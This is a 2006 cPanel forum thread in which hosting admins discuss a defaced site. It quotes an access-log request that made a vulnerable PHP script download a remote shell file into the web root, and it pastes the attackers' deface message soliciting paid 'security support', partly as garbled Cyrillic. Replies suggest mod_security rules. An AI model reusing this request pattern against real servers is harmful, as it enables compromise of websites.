The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

WARNING: Downloadable Shell Exploit

Discussion in 'General Discussion' started by jackie46, Apr 19, 2006.

  1. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    0
    One of our user websites was hacked and defaced even with the latest mod_security rules in place. Seems like there is a new way to download php shell scripts to a users directory then executing it.

    195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET /rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome%2Fstitadd4%2Fpublic_html%2Fimages%2Fdvd HTTP/1.1" 200 12933 "http://www.site.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"

    Seems like this command could be executed on anyone website which would lead to a site or entire server compromise.

    We need a mod_security rule for this one.

    They also download a script called z12sh.php which was the actual shell script executed to hack the site. Needless to say, i ran this script and was horrified at all the information is showed me about my server not to mention the disabled functions in php ini eg php_shell,dl,passthru etc did nothing to stop the execution of the script.

    V.I.P HACKER DEFACE

    -{Z12-HACKER-GROUP-IS-V.I.P. TEAM}-

    This SITE HACKED BY

    Mr. Gh0ster

    English DEFACE VERSION

    Because of numerous unsecurity positions of your site has been made DEFACE.

    Safety this the most important on the Internet.

    You can have for small money ours security support.

    For this purpose write the letter on our E-mail.

    On a regular basis visit ours private a site on the Internet!

    z12team@gmail.com

    Ðóññêàÿ âåðñèÿ ÄÅÔÅÉÑÀ!!!

    Èç-çà ìíîãî÷èñëåííûõ äûðîê â áåçîïàñíîñòè âàøåãî ñàéòà, áûë ñäåëàí åãî ÄÅÔÅÉÑ!

    Áåçîïàñíîñòü - ñàìîå ãëàâíîå â Èíòåðíåòå.

    Çà íåáîëüøèå äåíüãè ÂÛ ìîæåòå ïîëó÷èòü íàøó, ÕÀÊÅÐÑÊÓÞ, 100%-íóþ ïîääåðæêó áåçîïàñíîñòè.

    Äëÿ ýòîãî íàïèøèòå ïèñüìî íà íàø å-ìåéë.

    Ðåãóëÿðíî ïîñåùàéòå íàø ëè÷íûé ñàéò â Èíòåðíåòå! ÒÀÌ ÅÑÒÜ ÂѨ =)



    0 1 0 0 0 1 1 0 0 0 0 0 0 1 0 0 1 1 0 0 0 1 0 1 1 1 1 1 0 1 0 0 0 1 1 0 0 1 0 1 0 1 0 1 1 1 1 0 0 0 1 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 0 1 0 1 1 1 0 0 0 1 0 1 1 0 0 1 1 1 0 1 0 0 1 1 0 1 0 1 1 0 1 1 1 0 0 0 0 0 1 0 0 1 1 1 1 1 1 1 1 0 0 1 1 1 0 0 1 0 1 0 0 1 0 0 1 0 0 1 1 0 1 1 (C) Z12 HACKER GROUP, 2006
     
    #1 jackie46, Apr 19, 2006
    Last edited: Apr 19, 2006
  2. fleksi

    fleksi Well-Known Member

    Joined:
    Sep 17, 2003
    Messages:
    125
    Likes Received:
    0
    Trophy Points:
    16
    try using mode_security rules from h**p://www.gotroot.com

    -FL-
     
  3. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    GET /rapidpro51.php?link=http://www.megaupload.com/ru/?d=D6DOKVCP&comment=&email=&method=tc &partSize=10&proxy=&path=/home/stitadd4/publ ic_html/images/dvd HTTP/1.1" 200 12933 "http://www.site.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"


    Is this site running a custom made script? If not, what software is this site running on?

    The 'hackers' included their url using the link variable (see link=http://...), which means allow_url_fopen is not disabled on your server or that account.

    Blocking link=http through mod_security is not an option here I think, because that might break their script (just a guess, since I don't know what it's supposed to do)

    Blocking megaupload.com or filenames through mod_security is pointless, since they can place their scripts on thousands of locations and name them whatever they want to name them.

    You could try blocking requests for "path=/", don't think that will cause false positives.

    It's nearly impossible to write mod_security rules for these type of attacks without generating false positives, especially with custom made scripts. If the script is exploitable then it should be fixed asap.
     
    #3 jamesbond, Apr 20, 2006
    Last edited: Apr 20, 2006
Loading...

Share This Page